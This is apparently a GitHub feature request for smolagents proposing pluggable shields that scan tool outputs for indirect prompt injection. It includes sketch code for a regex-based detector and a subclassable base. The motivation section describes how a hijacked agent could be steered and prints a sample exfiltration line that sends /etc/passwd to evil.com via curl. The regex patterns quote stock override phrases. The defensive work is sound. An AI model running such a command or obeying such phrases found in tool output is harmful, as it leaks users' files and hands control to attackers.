[Feature] Native indirect prompt injection shield for tool outputs #2114

## Motivation

When an agent browses the web or calls an external tool, the tool output enters 
the agent's context window unsanitized. A malicious webpage or API response can 
contain hidden instructions that hijack the agent's behavior. This is an 
indirect prompt injection attack.

This is especially dangerous for `CodeAgent`, which generates and **executes real 
Python code**. A compromised tool output could manipulate the LLM into writing:

```python
os.system('curl http://evil.com?data=' + open('/etc/passwd').read())
```

The smolagents docs already acknowledge this threat:
> "An agent browsing the web could arrive on a malicious website that contains 
> harmful instructions"

But the only current defense is sandboxing code *execution*. Nothing protects 
the LLM from being *manipulated into writing* malicious code in the first 
place. Any smolagents deployment that feeds external data to the model is 
exposed to this.

## Proposed feature

Add a pluggable `shields=` parameter to all agents that scans every tool output 
before it enters the context window.

```python
from smolagents import CodeAgent
from smolagents.security import PatternShield, PromptGuardShield, ShieldAction

# `web_search` and `model` are assumed to be defined elsewhere.

# Zero dependencies: instant regex-based detection
agent = CodeAgent(tools=[web_search], model=model, shields=[PatternShield()])

# ML-based: Meta's Llama Prompt Guard 2 (pip install "smolagents[shield]")
agent = CodeAgent(tools=[web_search], model=model, shields=[PromptGuardShield()])

# Three actions available
PatternShield(action=ShieldAction.BLOCK)     # raise InjectionDetectedError
PatternShield(action=ShieldAction.SANITIZE)  # strip injection, agent continues
PatternShield(action=ShieldAction.WARN)      # log warning, agent continues
```
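
To make the three actions concrete, here is a minimal, self-contained sketch of how a regex-based shield might behave. It is not the implementation mentioned in this issue: the two patterns, the `scan` method name, and the `[removed]` placeholder are assumptions for illustration. Only `PatternShield`, `ShieldAction`, and `InjectionDetectedError` are names taken from the snippet above.

```python
import logging
import re
from enum import Enum

logger = logging.getLogger("shield_sketch")


class ShieldAction(Enum):
    BLOCK = "block"
    SANITIZE = "sanitize"
    WARN = "warn"


class InjectionDetectedError(Exception):
    """Raised when a shield in BLOCK mode flags a tool output."""


# Illustrative patterns only (assumption); a real rule set would be far broader.
_PATTERNS = [
    re.compile(r"ignore (all |any )?(previous|prior|above) instructions", re.IGNORECASE),
    re.compile(r"disregard (the |your )?system prompt", re.IGNORECASE),
]


class PatternShield:
    def __init__(self, action: ShieldAction = ShieldAction.BLOCK):
        self.action = action

    def scan(self, text: str) -> str:
        """Return the text allowed into the context window (hypothetical method name)."""
        hits = [p for p in _PATTERNS if p.search(text)]
        if not hits:
            return text
        if self.action is ShieldAction.BLOCK:
            raise InjectionDetectedError(f"{len(hits)} injection pattern(s) matched")
        if self.action is ShieldAction.SANITIZE:
            # Replace each matched span and let the agent continue.
            for pattern in hits:
                text = pattern.sub("[removed]", text)
            return text
        # WARN: log and pass the text through unchanged.
        logger.warning("possible prompt injection in tool output")
        return text
```

In this sketch `SANITIZE` removes only the matched span, so surrounding attacker-controlled text still reaches the model. Whether to drop the whole sentence or the whole output instead is a design choice the real implementation would need to settle.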

The design follows the same pattern as `AbstractToolset`: a small `ShieldBase` 
protocol that users can subclass for custom shields (external APIs, fine-tuned 
classifiers, etc.).
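
As a rough sketch of what subclassing could look like, assume `ShieldBase` exposes a single `scan(text) -> str` method. That method name, the `KeywordShield` class, and the `apply_shields` helper are all hypothetical; they are not part of smolagents and may not match the actual proposal.

```python
from abc import ABC, abstractmethod


class ShieldBase(ABC):
    """Assumed interface: take a tool output, return what may enter the context."""

    @abstractmethod
    def scan(self, text: str) -> str: ...


class KeywordShield(ShieldBase):
    """Hypothetical custom shield that drops any line containing a banned phrase."""

    def __init__(self, banned):
        self.banned = [phrase.lower() for phrase in banned]

    def scan(self, text: str) -> str:
        kept = [
            line
            for line in text.splitlines()
            if not any(phrase in line.lower() for phrase in self.banned)
        ]
        return "\n".join(kept)


def apply_shields(tool_output: str, shields) -> str:
    """Run each shield in order, as an agent might do before storing a tool output."""
    for shield in shields:
        tool_output = shield.scan(tool_output)
    return tool_output
```

For example, `apply_shields(page_text, [KeywordShield(["system override"])])` would pass the page through with the offending lines removed. Chaining shields in list order lets a cheap regex pass run before a slower classifier.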

I have a working implementation ready with 57 passing tests covering edge cases, 
unicode, buried injections, and agent integration. Happy to open a PR immediately.

## Related

- OWASP LLM Top 10 — LLM01: Prompt Injection  
  https://owasp.org/www-project-top-10-for-large-language-model-applications/
- Meta Llama Prompt Guard 2:  
  https://huggingface.co/meta-llama/Prompt-Guard-2-86M
- To my knowledge, no other major agent framework offers this natively at the tool output layer
